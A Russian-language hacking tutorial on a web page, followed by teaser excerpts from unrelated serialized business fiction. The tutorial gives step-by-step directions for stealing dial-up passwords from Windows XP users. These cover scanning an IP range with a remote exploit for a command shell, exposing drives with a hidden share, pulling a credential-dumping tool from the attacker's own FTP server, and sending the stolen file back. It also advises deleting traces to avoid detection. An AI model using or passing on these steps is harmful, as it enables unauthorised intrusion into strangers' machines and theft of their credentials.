Как достать пароли от интернета в Windows 95/98/Me знает уже каждый. А вот достать их в Windows XP довольно сложно. 
В статье рассмотрены наиболее легкие способы добычи паролей от учетных записей Интернета у пользователя с операционной системой Windows XP. 
В ХР есть файл SAM , но в нем не хранится паролей на Dial-Up, а только пароли к учетным записям .Все пароли Dial-Up в Windows XP хранятся в реестре. Есть прога, под названием dialupass 2.4, которая вытаскивает их оттуда. С помощью этой программы мы можем увидеть все учетные записи и пароли к ним на компе с Win XP. Но одной программы нам мало. Для этого пригодится хорошая ошибка, допущенная корпорацией Microsoft. Эксплоит реализующий эту ошибку называется КАНТ2. Воспользовавшись этим эксплоитом, мы получаем в свое распоряжение командную строку удаленного компьютера с операционной системой Windows XP. 

Запускаем КАНТ2, вбиваем туда диапозон IP адресов, допустим: 192.168.1.0 по 192.168.1.254. Эксплоит находит уязвимые компы и перед нами появляется строчка “C:windowssystem32”. А теперь дело за нами . Если на удаленной машине, в настройках сети стоит галочка Доступ к файлам и принтерам, можем написать команду net share C$$=C: - этой командой мы расшариваем в корне диск С:, а знак доллара делает эту шару не видимой в сетевом окружении. Потом просто в адресной строке IE пишем IP компаС$$ и вот мы видим его диск С:. 

Копируем ему на винт нашу дорогую прогу dialupass 2.4, а в командной строке заходим в ту папку, куда вы скопировали прогу и пишете дорогую команду: dialupass /all /stext xz.txt. И…. перед нами появляется файл с названием xz.txt, мы быстренько копируем его себе на комп, а с удаленного компа этот txt файл и саму прогу быстро удаляем, чтобы нас не заметили. Открываем этот файл и видим… как вы думаете что? Конечно! Пароль к Dial-Up соединению! Можете поздравить себя с успешным хаком! Чтобы продолжить дальше искать уязвимые машины, в командной строке щелкаете Ctrl+Z и Эксплоит пойдет искать дальше. 

Но иногда бывает не все так легко, у некоторых не разрешен доступ к шарам вообще, и мы не сможем попасть на диск С: просто с винды, чтобы скопировать туда нашу прогу.

Настраиваем на своем компе ftp. Создаете себе учетную запись с логином и паролем и разрешаете запись себе на любую папку. 

Кидаете туда КАНТ2, когда вы получили консоль удаленного компа в свое распоряжение пишете три буквы: ftp. Вы переходите в режим ftp, потом пишете простую команду open «свой IP» заходите в ту папку, куда вы скинули нашу прожку, пишете команду get dialupass.exe и наша прога копируется туда, где вы находились до того как перешли в режим ftp, C:windowssystem32, если все правильно сделали вам сказали, что все успешно скопировано, пишете команду quit, вот вы опять в нашей папке C:windowssystem32. Затем опять пишете командочку dialupass /all /stext xz.txt, создается файл и мы можем его сразу просмотреть командой type xz.txt и пароль переписать на листочек или повторить обратные действия, скопировать его на ftp командой put pass.txt. Пороль у вас вкармане юзер без инета. 



Последние новости


Мамонтов корпорейшен. Часть 8

Хотя и в Москве у меня не все так гладко. Влияние Варсегова и «ПСБ» все таки не безгранично. В столице сосредоточены интересы многих групп. И я не одной из них перешел дорогу в бизнесе, в Союзе. У многих конкурентов есть связи в правительстве страны. И мне стали досаждать всякие федеральные и...
Читать далее »

Новая метла. Часть 7

Я был ошарашен. Козина убрал. Меня поднял. А потом, видимо, почувствовал, что я не во всем подчиняюсь, чересчур самостоятелен. И вот решил отделаться от меня, загнал в этот «второй исследовательский». Но какой, к черту, я ему конкурент? Нет, этого не может быть. А Катя продолжала: – Пр’о...
Читать далее »

Мамонтов корпорейшен. Часть 7

Такой ход мне поможет на выборах. Президент Союза не должен быть прямо связан с какими либо рекламными структурами. Именно для того, чтобы его не обвинили в передачи заказов предприятиям, которыми он же и управляет. А вот владение акциями компаний не является препятствием. Все это мне подсказала о...
Читать далее »

Пир во время чумы. Часть 6

Через две недели мы уже могли с полной уверенностью констатировать: нам удалось не только остановить отток средств из банка, но и привлечь значительное количество новых клиентов и вкладчиков. За каких то две недели банк поднялся в финансовом рейтинге на 82 пункта, совершив прямо таки фантастиче...
Читать далее »

В опале. Часть 11

Этого было достаточно, чтобы позвонившему позже Бабаеву сказали, что, к сожалению, в ближайшее время этим проектом заниматься не собираются. Административному директору хватило ума сопоставить отказ «Ворлд Инвест» с нашим телефонным разговором. Мне он ничего не сказал. Но накапал Протасову. Т...
Читать далее »

В опале. Часть 10

И вот – все готово. Новенькое оборудование в работе. Позвонил Бабаеву: – Спасибо за компьютеры. Все просто отлично. Он великодушен: – Нет проблем. Я тоже: – Подбросить тебе еще клиентов? Бабаев цедит через губу: – Ну, давай. Только быстро, а то к «Вестнику делопроизводства&ra...
Читать далее »

Мамонтов корпорейшен. Часть 5

Я привез на юбилей «Мамонтов Корпорейшн» отца. Заказал ему билеты первого класса. Поселил в гостинице «Метрополь». Он был ошеломлен роскошью. Пенсионер, бывший инженер. Но не подает вида, что это его впечатлило. Прошелся по номеру, глянул в окно на Большой театр: – Ничего, в этой халупе...
Читать далее »